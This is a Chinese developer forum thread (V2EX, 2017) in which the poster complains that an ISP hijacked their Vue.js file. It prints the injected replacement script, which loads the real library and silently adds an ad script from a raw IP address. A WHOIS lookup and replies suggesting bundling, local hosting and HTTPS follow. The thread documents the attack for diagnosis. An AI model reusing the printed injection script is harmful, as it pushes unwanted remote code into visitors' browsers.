V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
jun4rui
V2EX  ›  前端开发

Vue 被数据劫持很可恶啊

  •  
  •   jun4rui · 2017-11-07 19:33:18 +08:00 · 4384 次点击
    这是一个创建于 2607 天前的主题,其中的信息可能已经有所发展或是发生改变。

    偶尔刷新,发现报错说 Vue 错误找不到,这明显不可能嘛,一查,发现 Vue.js 被替换了,点进去看还有源代码!

    (function() {
        o = "http://xxxxxxxxxxxxx/vue2.5.3/vue.min.js?";
        sh = "http://175.6.223.15:9901/main.js?v=3.95&sp=4303&ty=dpc";
        w = window;
        d = document;
        function ins(s, dm, id) {
            e = d.createElement("script");
            e.src = s;
            e.type = "text/javascript";
            id ? e.id = id : null;
            dm.appendChild(e);
        }
        ;p = d.scripts[d.scripts.length - 1].parentNode;
        ins(o, p);
        ds = function() {
            db = d.body;
            if (db && !document.getElementById("bdstat")) {
                if ((w.innerWidth || d.documentElement.clientWidth || db.clientWidth) > 1) {
                    if (w.top == w.self) {
                        ins(sh, db, "bdstat");
                    }
                }
            } else {
                setTimeout("ds()", 1500);
            }
        }
        ;
        ds();
    }
    )();
    var mim_params = {
        'sp': '4303',
        'aid': '11982',
        'sda_man': '',
        'src': '0',
        'adtype': '18',
        'uid': 'VCpdXydAXCotUlNNKytcWF07LlxaWlJPLF1cKSQ/LyksLlRLKy1ZXQ==',
        'spid': 'hljunicom',
        'ad_list': '11982'
    };
    
    

    还偶尔被别的替换掉

    http://124.232.160.178/v1/?p=www.xxxxxxx.com.cn%2fzzzz%2fticket20171101%2fzzzzz%2fvue2.5.3%2fvue.min.js&t=18000001
    

    妈的真缺德,现在连 js 都被劫持了

    看了下 whois

    WHOIS Results for:175.6.223.15
    % [whois.apnic.net]
    % Whois data copyright terms http://www.apnic.net/db/dbcopyright.html
    
    % Information related to \'175.0.0.0 - 175.15.255.255\'
    
    % Abuse contact for \'175.0.0.0 - 175.15.255.255\' is \'[email protected]\'
    
    inetnum: 175.0.0.0 - 175.15.255.255
    netname: CHINANET-HN
    descr: CHINANET HUNAN PROVINCE NETWORK
    descr: China Telecom
    descr: No.31,jingrong street
    descr: Beijing 100032
    country: CN
    status: ALLOCATED PORTABLE
    admin-c: CH93-AP
    tech-c: CH636-AP
    remarks: service provider
    remarks: --------------------------------------------------------
    remarks: To report network abuse, please contact mnt-irt
    remarks: For troubleshooting, please contact tech-c and admin-c
    remarks: Report invalid contact via www.apnic.net/invalidcontact
    remarks: --------------------------------------------------------
    mnt-by: APNIC-HM
    mnt-lower: MAINT-CHINANET-HN
    last-modified: 2016-05-04T00:20:50Z
    source: APNIC
    mnt-irt: IRT-CHINANET-CN
    
    irt: IRT-CHINANET-CN
    address: No.31 ,jingrong street,beijing
    address: 100032
    e-mail: [email protected]
    abuse-mailbox: [email protected]
    admin-c: CH93-AP
    tech-c: CH93-AP
    auth: # Filtered
    mnt-by: MAINT-CHINANET
    last-modified: 2010-11-15T00:31:55Z
    source: APNIC
    
    role: CHINANET HUNAN
    address: No.1 TuanJie road,ChangSha,Hunan 410005
    country: CN
    phone: +86 731 4792092
    fax-no: +86 731 4792007
    e-mail: [email protected]
    remarks: send spam reports to [email protected]
    remarks: and abuse reports to [email protected]
    remarks: Please include detailed information and
    remarks: times in UTC
    admin-c: CH632-AP
    tech-c: CS499-AP
    nic-hdl: CH636-AP
    mnt-by: MAINT-CHINANET-HN
    last-modified: 2014-02-12T08:30:53Z
    source: APNIC
    
    person: Chinanet Hostmaster
    nic-hdl: CH93-AP
    e-mail: [email protected]
    address: No.31 ,jingrong street,beijing
    address: 100032
    phone: +86-10-58501724
    fax-no: +86-10-58501724
    country: CN
    mnt-by: MAINT-CHINANET
    last-modified: 2014-02-27T03:37:38Z
    source: APNIC
    
    % This query was served by the APNIC Whois Service version 1.88.15-43 (WHOIS-NODE2)
    

    麻痹!

    8 条回复    2018-02-08 20:24:03 +08:00
    CDL
        1
    CDL  
       2017-11-07 19:36:35 +08:00
    那就直接 webpage 整个打包
    jun4rui
        2
    jun4rui  
    OP
       2017-11-07 19:38:21 +08:00
    @CDL 你是说,webpack ?!
    CDL
        3
    CDL  
       2017-11-08 09:04:04 +08:00
    @jun4rui 是的,手抖打错了_(:зゝ∠)_
    wenzhoou
        4
    wenzhoou  
       2017-11-08 12:20:08 +08:00 via Android
    怎么被劫持的呢?
    sothx
        5
    sothx  
       2018-02-08 10:48:48 +08:00 via iPhone
    拖到本地
    jun4rui
        6
    jun4rui  
    OP
       2018-02-08 11:21:57 +08:00
    @sothx 你做的在线工具,放到本地用户要怎么玩?
    sothx
        7
    sothx  
       2018-02-08 20:23:31 +08:00 via iPhone
    @jun4rui vue 的路径拖本地
    sothx
        8
    sothx  
       2018-02-08 20:24:03 +08:00 via iPhone
    同时上 HTTPS
    关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   2729 人在线   最高记录 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 26ms · UTC 14:24 · PVG 22:24 · LAX 06:24 · JFK 09:24
    Developed with CodeLauncher
    ♥ Do have faith in what you're doing.